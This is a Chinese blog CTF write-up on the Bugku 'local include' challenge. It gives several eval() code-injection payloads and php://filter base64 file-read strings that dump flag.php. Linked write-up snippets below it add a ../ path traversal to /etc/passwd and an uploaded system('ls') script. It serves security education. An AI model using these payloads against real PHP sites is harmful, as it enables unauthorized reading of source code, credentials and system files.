bugku 本地包含 writeup

最新推荐文章于 2025-06-29 21:50:15 发布
最新推荐文章于 2025-06-29 21:50:15 发布
阅读量3.7w 收藏 8
点赞数
文章标签: bugku 本地包含  writeup wp
本文详细解析了PHP中的文件包含及命令执行漏洞,通过具体示例展示了如何利用@$_REQUEST获取参数,并介绍了eval(), file(), print_r(), var_dump()等函数的使用方法与潜在风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

转载自:https://blog.youkuaiyun.com/Sanky0u/article/details/77197523

本地包含

右键查看源代码 
这里写图片描述 
搜了一下@$_REQUEST 的意思是获得参数,不论是@$_GET还是@$_POST可以得到的参数@$_REQUEST都能得到。 
所以构造hello的get参数。 
$a应该最后会像字符串替换一样替换成hello的参数值吧。

<1> hello=);print_r(file("flag.php")
<2> hello=);var_dump(file("flag.php")
<3> hello=file("flag.php")
<4> hello=);include(@$_POST['b']
    在POST区域:b=php://filter/convert.base64-encode/resource=flag.php
<5> hello=);include("php://filter/convert.base64-encode/resource=flag.php"

<6> hello=1);show_source('flag.php');var_dump(

这里写图片描述
之后将获得的flag.php的base64编码后的源码解码得到flag。 
这里写图片描述

  • eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行。
  • file() 函数把整个文件读入一个数组中,并将文件作为一个数组返回。
  • print_r() 函数只用于输出数组。
  • var_dump() 函数可以输出任何内容:输出变量的容,类型或字符串的内容,类型,长度。
  • hello=file(“flag.php”),最终会得到var_dump(file(“flag.php”)),以数组形式输出文件内容。
  • include()函数和php://input,php://filter结合很好用,php://filter可以用与读取文件源代码,结果是源代码base64编码后的结果。 
    php://filter/convert.base64-encode/resource=文件路径(如index.php)
xuchen16
关注
bugku题解-文件包含
qq_51775369的博客
10-15 1132
访问目标地址 发现有一个链接,点击,发现跳转到/index.php?file=show.php 之后就想到文件包含可以使用PHP伪协议,php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 在url后改为?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串...
BugkuCTF——最新web篇writeup(持续更新)
1匹黑马
11-16 4268
文章目录web2计算器web基础$_GETweb基础$_POST矛盾web3域名解析你必须让他停下变量1 web2 打开页面后F12查看源代码即可。 flag:KEY{Web-2-bugKssNNikls9100} 计算器 这里做了输入长度限制,F12选中输入框,修改长度限制即可。 flag:flag{CTF-bugku-0032} web基础$_GET 这里要理解超全局变量$_GET,只要我们传递的参数为what,并且内容为flag,即可输出flag。 flag:flag{bugku_get_su8
BUGKU_(本地包含+成绩单)
qq_44832048的博客
10-27 249
本地包含 在网页中新建标签页打开链接后出现以下一些PHP代码, include “flag.php” 包含flag。。。 下面解析这段代码: request这个变量和_request这个变量和r​equest这个变量和_GET、$_POST一样,都属于超级全局变量,运行时修改后者不会影响前者,修改后者不会影响前者。在这里可以以get/post/cookies等方式把以hello为名的东西提交过来 ...
Bugku——WEB篇(持续更新ing)
最新发布
qq_52854348的博客
06-29 681
BUGKU-WEB 滑稽 计算器 alert 你必须让他停下 头等舱 GET POST source 矛盾 备份是个好习惯
bugku本地包含
YenKoc的博客
10-20 248
重点:eval()函数有执行漏洞 函数本身作用,把字符串当成php代码计算。 所以自然想到,可以把我们的写好的php代码写入进去。 题目又暗示在本地,想到flag.php了,所以想办法把文件里面的内容显示出来,file()函数可以将文件内容以数组形式显示出来。 so: ...
CTF之Bugku 本地包含
weixin_41607190的博客
10-04 238
原理:利用eval()函数的执行漏洞,不过滤参数执行我们提交的结果 我们提交的结果被执行之后,可以爆出网站后台文件得到flag 转载: https://blog.youkuaiyun.com/xuchen16/article/details/82734758 ...
BugKu CTF Web WriteUp学习笔记
XQin9T1an的博客
08-06 1214
目录BugKu0x01 web20x02 计算器0x03 web基础$_GET0x04 web基础$_POST0x05 矛盾0x06 web30x07 域名解析0x08 你必须让他停下0x09 本地包含(×)0x0a 变量1 BugKu https://ctf.bugku.com/challenges 0x01 web2 听说聪明的人都能找到答案 题目链接:http://123.206.87.2...
bugkuctf web基础部分 writeup
river
03-20 3029
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
bugku baby lfi 2一题引入LFI漏洞(本地文件包含
2301_76690905的博客
10-25 1360
"./" 的作用是将文件路径 "./languages/../../../../../../etc/passwd" 解释为相对于当前工作目录的路径。我们的目标是要包含到/etc/passwd,那显而易见需要我们跳到根目录再进行包含,这里试了../../../../../etc/passwd提示不合法,那我们先访问当前目录下的languages再尝试跳回根目录,再去访问我们的目标。根据选择语言的提示,我们的参数名可能是language,尝试了file,language作为参数名后确定传参给language。
BugkuCTF(Web) WriteUp
CallMeSa1tyFish的博客
08-06 6254
Web部分 web2 点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag 文件上传测试 用burp抓包修改文件名后缀为.php 计算器 修改最大长度限制 web基础$_GET 题目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...
Bugku 本地文本包含
a3320315的博客
08-10 390
Bugku 本地文本包含 include 'flag.php'; $a = @$_REQUEST['hello']; eval(" var_dump( $a );"); highlight_file(__FILE__); ?> 解法: <1> hello=);print_r(file("flag.php") <2> hello=);var_dump...
Bugku—web—本地包含wp
我还在的博客
10-29 2175
0x00 前言 这是Bugku中web中的一道名为本地包含的题目。考察对PHP的知识。 0x01 解题过程 打开链接,你会看到一段PHP代码。 分析这段代码,最终得到攻击思路:通过构造名字为hello的攻击命令,把flag.php里面的代码以数组形式输出出来。 回车,则会看到flag ...
BugKu-web】lfi--本地包含
weixin_73625393的博客
10-24 233
1.启动场景方法一:2.页面输入:flag:shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}方法二:双编写绕过。
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 3401
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
Bugku-文件包含
qq_56611811的博客
05-16 307
得到flag{f285b417425153e41a60b28032c76395}file=show.php。试试能不能回到上级目录。
bugku 文件包含
weixin_74020633的博客
09-27 379
点击后,跳转到一个index页面,并且url后有flag=show.php,根据搜索知道这是典型的文件包含问题(虽然这里题目提示是文件包含了)之后尝试改为flag=index,发现不对。在开发过程中,当频繁需要跳转网页,或者需要某个函数时,程序员喜欢将重复的函数写道一个单独的文件中,在需要时调用文件,这种文件调用叫做文件包含。当调用的不是函数,而是一个文件时,就相当于把这个文件变了变量,也就给了用户操控参数的机会,就可能造成文件包含漏洞。通常获取源代码时,伪协议将xxx.php当文件执行,
bugku文件包含
qq_62046696的博客
04-30 1091
因为时文件包含的题目,首先尝试一下file=index.php,发现出现了报错信息。然后考虑用伪协议绕过一下 1.file=php://input仍然出现了报错信息,然后用一下其他的伪协议 2.file=php://filter/read=convert.base64-encode/resource=./index.php 得到base64加密的编码,通过base64解码就可以获取flag ...
文件包含BUGKU BUUCTF
zbbjya的博客
03-16 302
查看源代码 图片显示为文件包含 抓了一下包没啥发现 改了一下头,使用php://input 好像也没有什么用 说明这样的方式是不对的php伪协议 有 php://input 伪协议相当于一个削弱post的方法 php://filter可以获取指定文件源码,php://filter 是php中独有的一个协议,可以作为一个中间流来处理其他流,可以进行任意文件的读取;根据名字,filter,可以很容易想到这个协议可以用来过滤一些东西; 然后我们试试用这个 具体用法可看 https://blog.csdn.ne
Bugku CTF WEB解题技巧分享与讨论
WEB题目涉及的常见漏洞包括但不限于:SQL注入、XSS跨站脚本攻击、CSRF跨站请求伪造、SSRF服务器端请求伪造、文件包含、目录遍历、命令注入等。每种漏洞都有其特定的利用条件和方法。 - SQL注入:通过在SQL查询中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值